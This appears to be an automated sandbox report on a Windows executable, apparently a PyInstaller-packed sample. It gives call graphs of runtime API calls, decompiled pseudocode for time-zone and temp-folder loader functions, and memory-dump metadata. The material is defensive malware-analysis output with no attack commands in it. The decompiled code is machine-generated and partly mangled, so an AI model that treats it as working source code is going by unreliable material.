19424 7ff735c65f53 19424->19417 19426 7ff735c5c140 _fread_nolock 12 API calls 19424->19426 19428 7ff735c65f71 19424->19428 19425 7ff735c65f01 19425->19417 19427 7ff735c5d820 __crtLCMapStringW 6 API calls 19425->19427 19426->19428 19427->19417 19428->19417 19429 7ff735c5d820 __crtLCMapStringW 6 API calls 19428->19429 19431 7ff735c65fee 19429->19431 19430 7ff735c66023 19430->19417 19432 7ff735c59468 __free_lconv_num 11 API calls 19430->19432 19431->19430 19433 7ff735c5e704 WideCharToMultiByte 19431->19433 19432->19417 19434 7ff735c6601d 19433->19434 19434->19430 19435 7ff735c6604a 19434->19435 19435->19417 19436 7ff735c59468 __free_lconv_num 11 API calls 19435->19436 19436->19417 19438 7ff735c5d448 __crtLCMapStringW 5 API calls 19437->19438 19439 7ff735c5d85e 19438->19439 19440 7ff735c5d866 19439->19440 19443 7ff735c5d90c 19439->19443 19440->19417 19440->19424 19440->19425 19442 7ff735c5d8cf LCMapStringW 19442->19440 19444 7ff735c5d448 __crtLCMapStringW 5 API calls 19443->19444 19445 7ff735c5d93a __crtLCMapStringW 19444->19445 19445->19442 19448 7ff735c6489c 19447->19448 19449 7ff735c64885 19447->19449 19448->19449 19452 7ff735c648aa 19448->19452 19450 7ff735c53b18 _get_daylight 11 API calls 19449->19450 19451 7ff735c6488a 19450->19451 19453 7ff735c59400 _invalid_parameter_noinfo 37 API calls 19451->19453 19454 7ff735c540f0 45 API calls 19452->19454 19455 7ff735c64895 19452->19455 19453->19455 19454->19455 19455->19119 19457 7ff735c540f0 45 API calls 19456->19457 19458 7ff735c675bd 19457->19458 19461 7ff735c67218 19458->19461 19463 7ff735c67266 19461->19463 19462 7ff735c4a410 _wfindfirst32i64 8 API calls 19464 7ff735c6573d 19462->19464 19466 7ff735c672d8 GetCPInfo 19463->19466 19467 7ff735c672ed 19463->19467 19471 7ff735c672f1 19463->19471 19464->19119 19464->19144 19465 7ff735c5de64 _fread_nolock MultiByteToWideChar 19468 7ff735c67387 19465->19468 19466->19467 19466->19471 19467->19465 19467->19471 19469 7ff735c5c140 _fread_nolock 12 API calls 19468->19469 19470 7ff735c673be 19468->19470 19468->19471 19469->19470 19470->19471 19472 7ff735c5de64 _fread_nolock MultiByteToWideChar 19470->19472 19471->19462 19473 7ff735c67424 19472->19473 19474 7ff735c6744d 19473->19474 19475 7ff735c5de64 _fread_nolock MultiByteToWideChar 19473->19475 19474->19471 19476 7ff735c59468 __free_lconv_num 11 API calls 19474->19476 19477 7ff735c67446 19475->19477 19476->19471 19477->19474 19478 7ff735c5c140 _fread_nolock 12 API calls 19477->19478 19479 7ff735c6749b 19477->19479 19478->19479 19479->19474 19480 7ff735c5de64 _fread_nolock MultiByteToWideChar 19479->19480 19481 7ff735c6750e 19480->19481 19482 7ff735c67514 19481->19482 19483 7ff735c67531 19481->19483 19482->19474 19486 7ff735c59468 __free_lconv_num 11 API calls 19482->19486 19490 7ff735c5d6a4 19483->19490 19486->19474 19487 7ff735c67570 19487->19471 19489 7ff735c59468 __free_lconv_num 11 API calls 19487->19489 19488 7ff735c59468 __free_lconv_num 11 API calls 19488->19487 19489->19471 19491 7ff735c5d448 __crtLCMapStringW 5 API calls 19490->19491 19492 7ff735c5d6e2 19491->19492 19493 7ff735c5d90c __crtLCMapStringW 5 API calls 19492->19493 19495 7ff735c5d6ea 19492->19495 19494 7ff735c5d753 CompareStringW 19493->19494 19494->19495 19495->19487 19495->19488 19497 7ff735c66159 19496->19497 19498 7ff735c66172 HeapSize 19496->19498 19499 7ff735c53b18 _get_daylight 11 API calls 19497->19499 19500 7ff735c6615e 19499->19500 19501 7ff735c59400 _invalid_parameter_noinfo 37 API calls 19500->19501 19502 7ff735c66169 19501->19502 19502->19149 19504 7ff735c661ab 19503->19504 19505 7ff735c661a1 19503->19505 19507 7ff735c661b0 19504->19507 19513 7ff735c661b7 _get_daylight 19504->19513 19506 7ff735c5c140 _fread_nolock 12 API calls 19505->19506 19511 7ff735c661a9 19506->19511 19508 7ff735c59468 __free_lconv_num 11 API calls 19507->19508 19508->19511 19509 7ff735c661bd 19512 7ff735c53b18 _get_daylight 11 API calls 19509->19512 19510 7ff735c661ea HeapReAlloc 19510->19511 19510->19513 19511->19153 19512->19511 19513->19509 19513->19510 19514 7ff735c61bf8 _get_daylight 2 API calls 19513->19514 19514->19513 19516 7ff735c67181 __crtLCMapStringW 19515->19516 19517 7ff735c5d6a4 6 API calls 19516->19517 19518 7ff735c65626 19516->19518 19517->19518 19518->19213 19518->19217 18400 7ff735c5df20 18401 7ff735c5e108 18400->18401 18403 7ff735c5df63 _isindst 18400->18403 18402 7ff735c53b18 _get_daylight 11 API calls 18401->18402 18418 7ff735c5e0fa 18402->18418 18403->18401 18406 7ff735c5dfdf _isindst 18403->18406 18404 7ff735c4a410 _wfindfirst32i64 8 API calls 18405 7ff735c5e123 18404->18405 18421 7ff735c64578 18406->18421 18411 7ff735c5e134 18413 7ff735c59420 _wfindfirst32i64 17 API calls 18411->18413 18414 7ff735c5e148 18413->18414 18418->18404 18419 7ff735c5e03c 18419->18418 18445 7ff735c645b8 18419->18445 18422 7ff735c64586 18421->18422 18425 7ff735c5dffd 18421->18425 18452 7ff735c5eda0 EnterCriticalSection 18422->18452 18427 7ff735c63984 18425->18427 18428 7ff735c6398d 18427->18428 18429 7ff735c5e012 18427->18429 18430 7ff735c53b18 _get_daylight 11 API calls 18428->18430 18429->18411 18433 7ff735c639b4 18429->18433 18431 7ff735c63992 18430->18431 18432 7ff735c59400 _invalid_parameter_noinfo 37 API calls 18431->18432 18432->18429 18434 7ff735c639bd 18433->18434 18435 7ff735c5e023 18433->18435 18436 7ff735c53b18 _get_daylight 11 API calls 18434->18436 18435->18411 18439 7ff735c639e4 18435->18439 18437 7ff735c639c2 18436->18437 18438 7ff735c59400 _invalid_parameter_noinfo 37 API calls 18437->18438 18438->18435 18440 7ff735c639ed 18439->18440 18442 7ff735c5e034 18439->18442 18441 7ff735c53b18 _get_daylight 11 API calls 18440->18441 18443 7ff735c639f2 18441->18443 18442->18411 18442->18419 18444 7ff735c59400 _invalid_parameter_noinfo 37 API calls 18443->18444 18444->18442 18453 7ff735c5eda0 EnterCriticalSection 18445->18453 19519 7ff735c688a2 19520 7ff735c688b1 19519->19520 19522 7ff735c688bb 19519->19522 19523 7ff735c5edf4 LeaveCriticalSection 19520->19523 15392 7ff735c48bc8 15393 7ff735c47f07 15392->15393 15394 7ff735c47f83 15393->15394 15396 7ff735c49120 15393->15396 15397 7ff735c4915b memcpy_s 15396->15397 15398 7ff735c49145 15396->15398 15397->15394 15400 7ff735c5c140 15398->15400 15401 7ff735c5c18b 15400->15401 15405 7ff735c5c14f _get_daylight 15400->15405 15410 7ff735c53b18 15401->15410 15402 7ff735c5c172 RtlAllocateHeap 15404 7ff735c5c189 15402->15404 15402->15405 15404->15397 15405->15401 15405->15402 15407 7ff735c61bf8 15405->15407 15413 7ff735c61c34 15407->15413 15419 7ff735c59dd8 GetLastError 15410->15419 15412 7ff735c53b21 15412->15404 15418 7ff735c5eda0 EnterCriticalSection 15413->15418 15420 7ff735c59dfc 15419->15420 15421 7ff735c59e19 FlsSetValue 15419->15421 15420->15421 15433 7ff735c59e09 SetLastError 15420->15433 15422 7ff735c59e2b 15421->15422 15421->15433 15436 7ff735c5d3d0 15422->15436 15426 7ff735c59e58 FlsSetValue 15429 7ff735c59e64 FlsSetValue 15426->15429 15430 7ff735c59e76 15426->15430 15427 7ff735c59e48 FlsSetValue 15428 7ff735c59e51 15427->15428 15443 7ff735c59468 15428->15443 15429->15428 15449 7ff735c59a10 15430->15449 15433->15412 15441 7ff735c5d3e1 _get_daylight 15436->15441 15437 7ff735c5d432 15439 7ff735c53b18 _get_daylight 10 API calls 15437->15439 15438 7ff735c5d416 RtlAllocateHeap 15440 7ff735c59e3a 15438->15440 15438->15441 15439->15440 15440->15426 15440->15427 15441->15437 15441->15438 15442 7ff735c61bf8 _get_daylight 2 API calls 15441->15442 15442->15441 15444 7ff735c5946d RtlReleasePrivilege 15443->15444 15445 7ff735c5949c 15443->15445 15444->15445 15446 7ff735c59488 GetLastError 15444->15446 15445->15433 15447 7ff735c59495 __free_lconv_num 15446->15447 15448 7ff735c53b18 _get_daylight 9 API calls 15447->15448 15448->15445 15454 7ff735c598e8 15449->15454 15466 7ff735c5eda0 EnterCriticalSection 15454->15466 19532 7ff735c476cd 19533 7ff735c476d5 19532->19533 19534 7ff735c49120 12 API calls 19533->19534 19535 7ff735c47f83 19533->19535 19534->19535 18341 7ff735c57b54 18342 7ff735c57b6d 18341->18342 18343 7ff735c57b64 18341->18343 18343->18342 18347 7ff735c57664 18343->18347 18348 7ff735c5767d 18347->18348 18359 7ff735c57679 18347->18359 18368 7ff735c610f0 GetEnvironmentStringsW 18348->18368 18351 7ff735c5768a 18353 7ff735c59468 __free_lconv_num 11 API calls 18351->18353 18352 7ff735c57696 18375 7ff735c577e4 18352->18375 18353->18359 18356 7ff735c59468 __free_lconv_num 11 API calls 18357 7ff735c576bd 18356->18357 18358 7ff735c59468 __free_lconv_num 11 API calls 18357->18358 18358->18359 18359->18342 18360 7ff735c57a24 18359->18360 18361 7ff735c57a47 18360->18361 18366 7ff735c57a5e 18360->18366 18361->18342 18362 7ff735c5d3d0 _get_daylight 11 API calls 18362->18366 18363 7ff735c57ad2 18365 7ff735c59468 __free_lconv_num 11 API calls 18363->18365 18364 7ff735c5de64 MultiByteToWideChar _fread_nolock 18364->18366 18365->18361 18366->18361 18366->18362 18366->18363 18366->18364 18367 7ff735c59468 __free_lconv_num 11 API calls 18366->18367 18367->18366 18369 7ff735c57682 18368->18369 18371 7ff735c61114 18368->18371 18369->18351 18369->18352 18370 7ff735c5c140 _fread_nolock 12 API calls 18372 7ff735c6114b memcpy_s 18370->18372 18371->18370 18371->18371 18373 7ff735c59468 __free_lconv_num 11 API calls 18372->18373 18374 7ff735c6116b FreeEnvironmentStringsW 18373->18374 18374->18369 18376 7ff735c5780c 18375->18376 18377 7ff735c5d3d0 _get_daylight 11 API calls 18376->18377 18390 7ff735c57847 18377->18390 18378 7ff735c5784f 18379 7ff735c59468 __free_lconv_num 11 API calls 18378->18379 18380 7ff735c5769e 18379->18380 18380->18356 18381 7ff735c578c9 18382 7ff735c59468 __free_lconv_num 11 API calls 18381->18382 18382->18380 18383 7ff735c5d3d0 _get_daylight 11 API calls 18383->18390 18384 7ff735c578b8 18394 7ff735c57900 18384->18394 18386 7ff735c5ef30 _wfindfirst32i64 37 API calls 18386->18390 18388 7ff735c59468 __free_lconv_num 11 API calls 18388->18378 18389 7ff735c578ec 18391 7ff735c59420 _wfindfirst32i64 17 API calls 18389->18391 18390->18378 18390->18381 18390->18383 18390->18384 18390->18386 18390->18389 18392 7ff735c59468 __free_lconv_num 11 API calls 18390->18392 18393 7ff735c578fe 18391->18393 18392->18390 18398 7ff735c57905 18394->18398 18399 7ff735c578c0 18394->18399 18395 7ff735c5792e 18397 7ff735c59468 __free_lconv_num 11 API calls 18395->18397 18396 7ff735c59468 __free_lconv_num 11 API calls 18396->18398 18397->18399 18398->18395 18398->18396 18399->18388 18459 7ff735c55d50 18460 7ff735c55d7e 18459->18460 18461 7ff735c55db7 18459->18461 18462 7ff735c53b18 _get_daylight 11 API calls 18460->18462 18461->18460 18463 7ff735c55dbc FindFirstFileExW 18461->18463 18464 7ff735c55d83 18462->18464 18465 7ff735c55dde GetLastError 18463->18465 18466 7ff735c55e25 18463->18466 18467 7ff735c59400 _invalid_parameter_noinfo 37 API calls 18464->18467 18469 7ff735c55df8 18465->18469 18470 7ff735c55de9 18465->18470 18519 7ff735c55fc0 18466->18519 18472 7ff735c55d8e 18467->18472 18471 7ff735c53b18 _get_daylight 11 API calls 18469->18471 18474 7ff735c55e15 18470->18474 18475 7ff735c55df3 18470->18475 18476 7ff735c55e05 18470->18476 18471->18472 18480 7ff735c4a410 _wfindfirst32i64 8 API calls 18472->18480 18477 7ff735c53b18 _get_daylight 11 API calls 18474->18477 18475->18469 18475->18474 18479 7ff735c53b18 _get_daylight 11 API calls 18476->18479 18477->18472 18478 7ff735c55fc0 _wfindfirst32i64 10 API calls 18481 7ff735c55e4b 18478->18481 18479->18472 18482 7ff735c55da2 18480->18482 18483 7ff735c55fc0 _wfindfirst32i64 10 API calls 18481->18483 18484 7ff735c55e59 18483->18484 18485 7ff735c5ef30 _wfindfirst32i64 37 API calls 18484->18485 18486 7ff735c55e77 18485->18486 18486->18472 18487 7ff735c55e83 18486->18487 18488 7ff735c59420 _wfindfirst32i64 17 API calls 18487->18488 18489 7ff735c55e97 18488->18489 18490 7ff735c55ec1 18489->18490 18492 7ff735c55f00 FindNextFileW 18489->18492 18491 7ff735c53b18 _get_daylight 11 API calls 18490->18491 18493 7ff735c55ec6 18491->18493 18494 7ff735c55f0f GetLastError 18492->18494 18495 7ff735c55f50 18492->18495 18496 7ff735c59400 _invalid_parameter_noinfo 37 API calls 18493->18496 18498 7ff735c55f29 18494->18498 18499 7ff735c55f1a 18494->18499 18497 7ff735c55fc0 _wfindfirst32i64 10 API calls 18495->18497 18500 7ff735c55ed1 18496->18500 18501 7ff735c55f68 18497->18501 18503 7ff735c53b18 _get_daylight 11 API calls 18498->18503 18502 7ff735c55f43 18499->18502 18505 7ff735c55f24 18499->18505 18506 7ff735c55f36 18499->18506 18508 7ff735c4a410 _wfindfirst32i64 8 API calls 18500->18508 18504 7ff735c55fc0 _wfindfirst32i64 10 API calls 18501->18504 18507 7ff735c53b18 _get_daylight 11 API calls 18502->18507 18503->18500 18509 7ff735c55f76 18504->18509 18505->18498 18505->18502 18510 7ff735c53b18 _get_daylight 11 API calls 18506->18510 18507->18500 18511 7ff735c55ee4 18508->18511 18512 7ff735c55fc0 _wfindfirst32i64 10 API calls 18509->18512 18510->18500 18513 7ff735c55f84 18512->18513 18514 7ff735c5ef30 _wfindfirst32i64 37 API calls 18513->18514 18515 7ff735c55fa2 18514->18515 18515->18500 18516 7ff735c55faa 18515->18516 18517 7ff735c59420 _wfindfirst32i64 17 API calls 18516->18517 18518 7ff735c55fbe 18517->18518 18520 7ff735c55fde FileTimeToSystemTime 18519->18520 18521 7ff735c55fd8 18519->18521 18522 7ff735c55fed SystemTimeToTzSpecificLocalTime 18520->18522 18524 7ff735c56003 18520->18524 18521->18520 18521->18524 18522->18524 18523 7ff735c4a410 _wfindfirst32i64 8 API calls 18525 7ff735c55e3d 18523->18525 18524->18523 18525->18478 15468 7ff735c57db9 15480 7ff735c586b4 15468->15480 15485 7ff735c59c60 GetLastError 15480->15485 15486 7ff735c59c84 FlsGetValue 15485->15486 15487 7ff735c59ca1 FlsSetValue 15485->15487 15489 7ff735c59c9b 15486->15489 15490 7ff735c59c91 15486->15490 15488 7ff735c59cb3 15487->15488 15487->15490 15492 7ff735c5d3d0 _get_daylight 11 API calls 15488->15492 15489->15487 15491 7ff735c59d0d SetLastError 15490->15491 15494 7ff735c59d2d 15491->15494 15495 7ff735c586bd 15491->15495 15493 7ff735c59cc2 15492->15493 15497 7ff735c59ce0 FlsSetValue 15493->15497 15498 7ff735c59cd0 FlsSetValue 15493->15498 15496 7ff735c5886c __CxxCallCatchBlock 38 API calls 15494->15496 15507 7ff735c5886c 15495->15507 15499 7ff735c59d32 15496->15499 15501 7ff735c59cec FlsSetValue 15497->15501 15502 7ff735c59cfe 15497->15502 15500 7ff735c59cd9 15498->15500 15503 7ff735c59468 __free_lconv_num 11 API calls 15500->15503 15501->15500 15504 7ff735c59a10 _get_daylight 11 API calls 15502->15504 15503->15490 15505 7ff735c59d06 15504->15505 15506 7ff735c59468 __free_lconv_num 11 API calls 15505->15506 15506->15491 15516 7ff735c566cc 15507->15516 15550 7ff735c565ac 15516->15550 15555 7ff735c5eda0 EnterCriticalSection 15550->15555

                                                                                                                                                                                                                              Executed Functions

                                                                                                                                                                                                                              Function 00007FF735C63FE4 Relevance: 14.3, APIs: 6, Strings: 2, Instructions: 334timeCOMMONCrypto
                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 160 7ff735c63fe4-7ff735c6401f call 7ff735c63974 call 7ff735c6397c call 7ff735c639e4 167 7ff735c64249-7ff735c64295 call 7ff735c59420 call 7ff735c63974 call 7ff735c6397c call 7ff735c639e4 160->167 168 7ff735c64025-7ff735c64030 call 7ff735c63984 160->168 194 7ff735c6429b-7ff735c642a6 call 7ff735c63984 167->194 195 7ff735c643d3-7ff735c64441 call 7ff735c59420 call 7ff735c5fc38 167->195 168->167 174 7ff735c64036-7ff735c64040 168->174 176 7ff735c64062-7ff735c64066 174->176 177 7ff735c64042-7ff735c64045 174->177 180 7ff735c64069-7ff735c64071 176->180 179 7ff735c64048-7ff735c64053 177->179 183 7ff735c6405e-7ff735c64060 179->183 184 7ff735c64055-7ff735c6405c 179->184 180->180 181 7ff735c64073-7ff735c64086 call 7ff735c5c140 180->181 190 7ff735c6409e-7ff735c640aa call 7ff735c59468 181->190 191 7ff735c64088-7ff735c6408a call 7ff735c59468 181->191 183->176 187 7ff735c6408f-7ff735c6409d 183->187 184->179 184->183 200 7ff735c640b1-7ff735c640b9 190->200 191->187 194->195 205 7ff735c642ac-7ff735c642b7 call 7ff735c639b4 194->205 214 7ff735c64443-7ff735c6444a 195->214 215 7ff735c6444f-7ff735c64452 195->215 200->200 203 7ff735c640bb-7ff735c640cc call 7ff735c5ef30 200->203 203->167 213 7ff735c640d2-7ff735c64128 call 7ff735c4b800 * 4 call 7ff735c63f00 203->213 205->195 212 7ff735c642bd-7ff735c642e0 call 7ff735c59468 GetTimeZoneInformation 205->212 226 7ff735c643a8-7ff735c643d2 call 7ff735c6396c call 7ff735c6395c call 7ff735c63964 212->226 227 7ff735c642e6-7ff735c64307 212->227 273 7ff735c6412a-7ff735c6412e 213->273 218 7ff735c644df-7ff735c644e2 214->218 219 7ff735c64489-7ff735c6449c call 7ff735c5c140 215->219 220 7ff735c64454 215->220 223 7ff735c64457 218->223 224 7ff735c644e8-7ff735c644f0 call 7ff735c63fe4 218->224 239 7ff735c6449e 219->239 240 7ff735c644a7-7ff735c644c2 call 7ff735c5fc38 219->240 220->223 229 7ff735c6445c-7ff735c64488 call 7ff735c59468 call 7ff735c4a410 223->229 230 7ff735c64457 call 7ff735c64260 223->230 224->229 233 7ff735c64309-7ff735c6430f 227->233 234 7ff735c64312-7ff735c64319 227->234 230->229 233->234 243 7ff735c6431b-7ff735c64323 234->243 244 7ff735c6432d 234->244 241 7ff735c644a0-7ff735c644a5 call 7ff735c59468 239->241 256 7ff735c644c9-7ff735c644db call 7ff735c59468 240->256 257 7ff735c644c4-7ff735c644c7 240->257 241->220 243->244 250 7ff735c64325-7ff735c6432b 243->250 253 7ff735c6432f-7ff735c643a3 call 7ff735c4b800 * 4 call 7ff735c611c8 call 7ff735c644f8 * 2 244->253 250->253 253->226 256->218 257->241 274 7ff735c64134-7ff735c64138 273->274 275 7ff735c64130 273->275 274->273 277 7ff735c6413a-7ff735c6415f call 7ff735c66e78 274->277 275->274 283 7ff735c64162-7ff735c64166 277->283 285 7ff735c64168-7ff735c64173 283->285 286 7ff735c64175-7ff735c64179 283->286 285->286 288 7ff735c6417b-7ff735c6417f 285->288 286->283 291 7ff735c64200-7ff735c64204 288->291 292 7ff735c64181-7ff735c641a9 call 7ff735c66e78 288->292 293 7ff735c6420b-7ff735c64218 291->293 294 7ff735c64206-7ff735c64208 291->294 300 7ff735c641ab 292->300 301 7ff735c641c7-7ff735c641cb 292->301 296 7ff735c6421a-7ff735c64230 call 7ff735c63f00 293->296 297 7ff735c64233-7ff735c64242 call 7ff735c6396c call 7ff735c6395c 293->297 294->293 296->297 297->167 305 7ff735c641ae-7ff735c641b5 300->305 301->291 303 7ff735c641cd-7ff735c641eb call 7ff735c66e78 301->303 312 7ff735c641f7-7ff735c641fe 303->312 305->301 308 7ff735c641b7-7ff735c641c5 305->308 308->301 308->305 312->291 313 7ff735c641ed-7ff735c641f1 312->313 313->291 314 7ff735c641f3 313->314 314->312
                                                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                                                              			E00007FF77FF735C63FE4(void* __eflags, void* __rax, signed short* __rcx, char _a16, char _a24) {
				void* _t10;
				intOrPtr _t23;
				void* _t29;
				signed short* _t31;
				intOrPtr _t36;
				signed long long _t42;

				_t29 = __rax;
				E00007FF77FF735C6397C(E00007FF77FF735C63974(_t10));
				r12d = 0;
				_a16 = r12d;
				_a24 = r12d;
				if (E00007FF77FF735C639E4(_t29,  &_a16) != 0) goto 0x35c64249;
				if (E00007FF77FF735C63984(_t29,  &_a24) != 0) goto 0x35c64249;
				_t36 =  *0x35c8b2a0; // 0x0
				_t23 = _t36;
				if (_t23 == 0) goto 0x35c64062;
				r8d =  *(__rcx + _t36 - __rcx) & 0x0000ffff;
				if (_t23 != 0) goto 0x35c6405e;
				_t31 =  &(__rcx[1]);
				if (r8d != 0) goto 0x35c64048;
				if (( *__rcx & 0x0000ffff) - r8d == 0) goto 0x35c6408f;
				_t39 = (_t42 | 0xffffffff) + 1;
				if (__rcx[(_t42 | 0xffffffff) + 1] != r12w) goto 0x35c64069;
				E00007FF77FF735C5C140(_t31, 2 + _t39 * 2);
				if (_t31 != 0) goto 0x35c6409e;
				return E00007FF77FF735C59468(_t31, 2 + _t39 * 2);
			}









                                                                                                                                                                                                                              0x7ff735c63fe4
                                                                                                                                                                                                                              0x7ff735c64001
                                                                                                                                                                                                                              0x7ff735c64006
                                                                                                                                                                                                                              0x7ff735c6400d
                                                                                                                                                                                                                              0x7ff735c64014
                                                                                                                                                                                                                              0x7ff735c6401f
                                                                                                                                                                                                                              0x7ff735c64030
                                                                                                                                                                                                                              0x7ff735c64036
                                                                                                                                                                                                                              0x7ff735c6403d
                                                                                                                                                                                                                              0x7ff735c64040
                                                                                                                                                                                                                              0x7ff735c6404b
                                                                                                                                                                                                                              0x7ff735c64053
                                                                                                                                                                                                                              0x7ff735c64055
                                                                                                                                                                                                                              0x7ff735c6405c
                                                                                                                                                                                                                              0x7ff735c64060
                                                                                                                                                                                                                              0x7ff735c64069
                                                                                                                                                                                                                              0x7ff735c64071
                                                                                                                                                                                                                              0x7ff735c6407b
                                                                                                                                                                                                                              0x7ff735c64086
                                                                                                                                                                                                                              0x7ff735c6409d

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • _get_daylight.LIBCMT ref: 00007FF735C64029
                                                                                                                                                                                                                                • Part of subcall function 00007FF735C63984: _invalid_parameter_noinfo.LIBCMT ref: 00007FF735C63998
                                                                                                                                                                                                                                • Part of subcall function 00007FF735C59468: RtlReleasePrivilege.NTDLL(?,?,?,00007FF735C6138E,?,?,?,00007FF735C613CB,?,?,00000000,00007FF735C6189C,?,?,?,00007FF735C617CF), ref: 00007FF735C5947E
                                                                                                                                                                                                                                • Part of subcall function 00007FF735C59468: GetLastError.KERNEL32(?,?,?,00007FF735C6138E,?,?,?,00007FF735C613CB,?,?,00000000,00007FF735C6189C,?,?,?,00007FF735C617CF), ref: 00007FF735C59488
                                                                                                                                                                                                                                • Part of subcall function 00007FF735C59420: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF735C593FE,?,?,?,?,?,00007FF735C5194E), ref: 00007FF735C59429
                                                                                                                                                                                                                                • Part of subcall function 00007FF735C59420: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF735C593FE,?,?,?,?,?,00007FF735C5194E), ref: 00007FF735C5944E
                                                                                                                                                                                                                              • _get_daylight.LIBCMT ref: 00007FF735C64018
                                                                                                                                                                                                                                • Part of subcall function 00007FF735C639E4: _invalid_parameter_noinfo.LIBCMT ref: 00007FF735C639F8
                                                                                                                                                                                                                              • _get_daylight.LIBCMT ref: 00007FF735C6428E
                                                                                                                                                                                                                              • _get_daylight.LIBCMT ref: 00007FF735C6429F
                                                                                                                                                                                                                              • _get_daylight.LIBCMT ref: 00007FF735C642B0
                                                                                                                                                                                                                              • GetTimeZoneInformation.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000,?,00007FF735C644F0), ref: 00007FF735C642D7
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.454572575.00007FF735C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735C40000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454563406.00007FF735C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454600190.00007FF735C69000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C8A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff735c40000_PAP46E1UkZ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureInformationLastPresentPrivilegeProcessProcessorReleaseTimeZone
                                                                                                                                                                                                                              • String ID: Pacific Daylight Time$Pacific Standard Time
                                                                                                                                                                                                                              • API String ID: 415722205-1154798116
                                                                                                                                                                                                                              • Opcode ID: 1931ee91496662859d833d32586b2b6d087b9ff673fa6580726042d167a60e6d
                                                                                                                                                                                                                              • Instruction ID: bbaf540256898e7bb3eba926d9de6fe10410b7057436646dc86246bd01025dbc
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1931ee91496662859d833d32586b2b6d087b9ff673fa6580726042d167a60e6d
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 74D1CE67A08253A6EB20BF22D4805B9B761EF44F8CFC84235EA4D47685DF3CE541E760
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF735C46230 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 139COMMONCrypto
                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              C-Code - Quality: 53%
                                                                                                                                                                                                                              			E00007FF77FF735C46230(void* __ecx, void* __edx, void* __rax, long long __rbx, void* __rcx, void* __rdx, long long __rbp, void* __r8, void* __r9, intOrPtr _a8, char _a16, long long _a24, long long _a32, char _a56, signed int _a8248, void* _a8264) {
				void* __rsi;
				void* _t17;
				long _t21;
				void* _t24;
				void* _t50;
				void* _t60;
				signed long long _t72;
				signed long long _t73;
				intOrPtr _t122;
				void* _t124;
				void* _t126;
				void* _t131;
				void* _t132;
				void* _t133;
				void* _t135;

				_t131 = __r9;
				_t74 = __rbx;
				_t50 = __ecx;
				_a24 = __rbx;
				_a32 = __rbp;
				E00007FF77FF735C4A3B0(0x2060, __rax, _t132, _t133);
				_t127 = _t126 - __rax;
				_t72 =  *0x35c7b008; // 0x861d85c91f07
				_t73 = _t72 ^ _t126 - __rax;
				_a8248 = _t73;
				_t124 = __rdx;
				_t135 = __rcx;
				if (__rdx == 0) goto 0x35c462bb;
				E00007FF77FF735C46440(_t73, "TMP");
				E00007FF77FF735C45F60(__edx, _t73, __rbx, _t124, __r8);
				if (_t73 == 0) goto 0x35c4638f;
				_t17 = E00007FF77FF735C55CF0(_t50, _t73, L"TMP", _t73);
				E00007FF77FF735C5377C(_t50, _t73, _t73, __r8);
				if (_t17 == 0) goto 0x35c462c0;
				E00007FF77FF735C42820(_t73, "LOADER: Failed to set the TMP environment variable.\n", _t73, __r8, _t131);
				goto 0x35c46418;
				_t122 = _a8;
				_t21 = GetTempPathW(??, ??);
				0x35c58764();
				r9d = _t21;
				_t130 = L"_MEI%d";
				E00007FF77FF735C42520(_t73,  &_a16,  &_a56, L"_MEI%d", _t131);
				E00007FF77FF735C56F80(_t131);
				_t24 = E00007FF77FF735C470C0(_t73, _t74, _t73); // executed
				if (_t24 == 0) goto 0x35c46396;
				E00007FF77FF735C5377C(0x1000, _t73,  &_a16, L"_MEI%d");
				if (1 - 5 < 0) goto 0x35c462f0;
				if (_t124 == 0) goto 0x35c4638f;
				r8d = 0;
				E00007FF77FF735C47250(_t73, _t74, _t73, "TMP", _t122, L"_MEI%d");
				if (_t122 == 0) goto 0x35c46379;
				r8d = 0;
				_t119 = _t73;
				E00007FF77FF735C47250(_t73, _t74, _t73, _t122, _t122, L"_MEI%d");
				E00007FF77FF735C55CF0(0, _t73, _t73, _t73);
				E00007FF77FF735C5377C(0, _t73, _t73, L"_MEI%d");
				E00007FF77FF735C5377C(0, _t73, _t73, L"_MEI%d");
				E00007FF77FF735C5377C(0, _t122, _t73, L"_MEI%d");
				goto 0x35c46418;
				SetEnvironmentVariableW(??, ??);
				E00007FF77FF735C5377C(0, _t73, _t73, _t130);
				goto 0x35c46418;
				r8d = 0x1000;
				E00007FF77FF735C47360(_t60, _t73, _t135, _t73, _t122, _t124, _t130);
				E00007FF77FF735C5377C(0, _t73, _t119, _t130);
				if (_t124 == 0) goto 0x35c46413;
				r8d = 0;
				E00007FF77FF735C47250(_t73, _t73, _t119, "TMP", _t122, _t130);
